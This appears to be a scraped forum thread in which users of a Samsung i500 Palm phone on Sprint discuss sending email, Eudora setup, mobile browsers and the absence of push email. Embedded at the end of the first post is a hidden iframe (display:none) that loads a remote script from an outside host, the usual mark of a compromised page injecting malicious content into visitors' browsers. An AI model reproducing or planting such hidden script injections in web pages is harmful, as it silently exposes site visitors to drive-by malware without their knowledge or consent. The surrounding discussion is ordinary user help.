+ Reply to Thread

How do you create a simple email?

It's bad enough that SMS does not work on this phone, but it doesn't appear there is even a way to generate an email. The mail app leads you to believe you're creating an email, but when you click send it goes nowhere except the outbox. I also would have expected to be able to send emails from my addres book, but there is no such capability. C'mon even my non PDA 8100 did these things. Please reply and tell me I'm wrong & the instructions on how to send/receive emails.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: How do you create a simple email?

Originally posted by 8notime
    It's bad enough that SMS does not work on this phone, but it doesn't appear there is even a way to generate an email. The mail app leads you to believe you're creating an email, but when you click send it goes nowhere except the outbox. I also would have expected to be able to send emails from my addres book, but there is no such capability. C'mon even my non PDA 8100 did these things. Please reply and tell me I'm wrong & the instructions on how to send/receive emails.
    the email program that comes with it only syncs with your email client on your desktop (outlook) if you want true email capabilities you'll have to get an email program such as snapper mail

~Kimberly

Re: How do you create a simple email?

It's bad enough that SMS does not work on this phone, but it doesn't appear there is even a way to generate an email. The mail app leads you to believe you're creating an email, but when you click send it goes nowhere except the outbox. I also would have expected to be able to send emails from my addres book, but there is no such capability. C'mon even my non PDA 8100 did these things. Please reply and tell me I'm wrong & the instructions on how to send/receive emails.
    Download Eudora from Eudora.com. I've been using it and loving it with my Treo and now I've loaded it onto my I5. It does allow you to pull email addresses that you have saved in your email box. Its a great application and it is FREE!

Kimberly
    Don't shake my tree if you don't like my peaches!!!

Re: Re: How do you create a simple email?

Agreed, the Mail application is misleading and useless. Eudora, http://eudora.com/internetsuite/download/ is working well for me.

-Alvin

Thanks for the tips! I assume you use these programs to access your SPCS mail accounts also? I think my problem is I've never touched a Palm Phone (or Palm anything), and I just have a learning curve to get past. Going from Vision enabled phones to one of these requires you to do things a little differently

~Kimberly
    Thanks for the tips! I assume you use these programs to access your SPCS mail accounts also? I think my problem is I've never touched a Palm Phone (or Palm anything), and I just have a learning curve to get past. Going from Vision enabled phones to one of these requires you to do things a little differently
    No problemo, you are in the right place. You are right, I use Eudora to access my Sprint mail, however, you can use Eudora to access any email server that offers POP access, like Yahoo. The only thing you will need to know when setting up your Eudora account are the incoming and outgoing servers....The ones for Sprint are: incoming is pop.sprintpcs.com and outgoing is smtp.sprintpcs.com

That is about as technical as it gets. Be sure to report back when you have this successfully set up.

Kimberly
    Don't shake my tree if you don't like my peaches!!!

Thanks Kimberly. There is an option on the Eudora sute for EIS 2.1 which is an email/browser combo. Is this worth downloading or should I just stick with the email client?

PHO
    Broward County Florida, "Home of the Hanging Chad"
    Thanks Kimberly. There is an option on the Eudora sute for EIS 2.1 which is an email/browser combo. Is this worth downloading or should I just stick with the email client?
    the browser is not bad, there are 4 or so that are available for palms, each have their pro's and cons' it shouldn't be big (download wise) and its FREE

if it takes you too long to download, you need a faster internet connection

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

Talking

My T1 line downloaded it pretty quickly It was rushing breakfast, packing for work and catching the trolley while reading posts on this forum that kept me from actually getting it installed. Now that I'm at work though & got a chance to install it, I see what you mean. These apps are a snap to install and there are so many to choose from!

PHO
    My T1 line downloaded it pretty quickly It was rushing breakfast, packing for work and catching the trolley while reading posts on this forum that kept me from actually getting it installed.
    oh, yeah, that stuff,

everyone except for the postst is overrated

A
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

The Dawn of SmartPhones Tony_ensemble's Avatar
    Has anyone tried Sprint Business Connect for emai with the i500? Supposedly it has a setting called "Allow Push Email".

Does anyone know if SBC will do 'real' push email with the i500 or just 'pole (pull) often' which is not as nearly as useful?

And/Or is there any way to achive real "push" with a Palm phone?
    The Saxon word for depression can be literally translated as "without beer", proving again that the Vikings were the pinnacle of all humankind.

You mentioned there were multiple browsers for this phone, what is the best one, what are some pros/cons of each?> Do they allow you to visit any website or just WAP enabled ones? I'
    m entirely new to this also.

Thanks,
    Jason

PHO
    Originally posted by Tony_ensemble
    Has anyone tried Sprint Business Connect for emai with the i500? Supposedly it has a setting called "Allow Push Email".

Does anyone know if SBC will do 'real' push email with the i500 or just 'pole (pull) often' which is not as nearly as useful?

And/Or is there any way to achive real "push" with a Palm phone?
    tony and Jross

Please go to the business connect thread that was gong on today i did a full long review.

my conclusion is push email is a No with them.

www.grtalk.com

PHO
    Originally posted by JRoss
    You mentioned there were multiple browsers for this phone, what is the best one, what are some pros/cons of each?> Do they allow you to visit any website or just WAP enabled ones? I'
    m entirely new to this also.

Thanks,
    Jason

The browsers including the included Blazer allow you to go to any website not just wap.

you usually can't do heavy java Like logging into your bank account

or flash

I haven't played with them in months. but we need to open a thread and start reviewing

www.grtalk.com

What is the closest thing/best method to make it like a blackberry. In other words how can someone send me a quick short email, and allow me to reply quickly, is this possible? is there a long sign in process, what program? I want something that is easyh to check, or would even notify me when i get new messages.. i'm entirely new...

thanks

Quite Convergent

What is the closest thing/best method to make it like a blackberry?

Take a look at the "Wireless Sync option on the i500" thread. PHO is a pessimist. Maybe someone can prove him wrong.

PHO

Re: What is the closest thing/best method to make it like a blackberry?

Originally posted by petersr
    Take a look at the "Wireless Sync option on the i500" thread. PHO is a pessimist. Maybe someone can prove him wrong.
    Crap i wrote a whole long post and my connection crashed and i lost it. DAMN it

Ok,

here is what works well

Periodic Fetch/ timed pull

good email programs for that

What is possible is to use a wireless hotsync and a macro program to do periodic syncs.

Here are problems

1. keeping vision on will block phone calls from coming in
    2. keeping vision on doesn't really keep it on, it times out after a while and you have to reconnect anyway which is the same as turning it off and back on.
    3. you may find yourself fighting with the phone while its doing a periodic fetch while your trying to do something else.

Ok, what JRoss is talking about with quick emails is really SMS, Short Mail - sprint doesn't support it. This is what half the people on these forums are complaining about. Its not samsung or the phone, its Sprint. this is well discussed on other threads.

There are workarounds like verichat, or scott's sms program.

you can recieve without being on vision, but have to sign onto vision to send. (its the send part that makes it 1/2 of an SMS system)

I don't know this for sure, but from what i can gather, true push email is only possible if Sprint supports it and they have no incentive to do it.

I can get a text page while i am on the phone with someone else. If sprint incorporated this into an email app, then there you go, real push mail.

But, the so called "push mail" solutions that i know of, just send you a text page telling you to check your mail.

Thats not push mail, its push notification.

you still have to sign onto vision, which takes a long time, to check just a quick mail.

If you really need blackberry, there is just nothign otu there right now that even comes close.

www.grtalk.com

The Dawn of SmartPhones Tony_ensemble's Avatar
    If you really need blackberry, there is just nothign otu there right now that even comes close.
    AMEN TO THAT BROTHER!!!!!

(PHO your tunring in to my hero - Thanks for all the help)
    The Saxon word for depression can be literally translated as "without beer", proving again that the Vikings were the pinnacle of all humankind.

My employer gave me a Blackberry 2 weeks ago and I *hate* it. I resisted it for over a year but finally had to accept it, partly due the obscene delays on this phone.

I hate it simply because I do not want to carry more than one device, and I already carry my cell phone. While it is certainly nerd chic to have the batman belt and the beer gut hanging over it, I'm trying to break the mold ...

Surely this push-email problem will be solved soon ...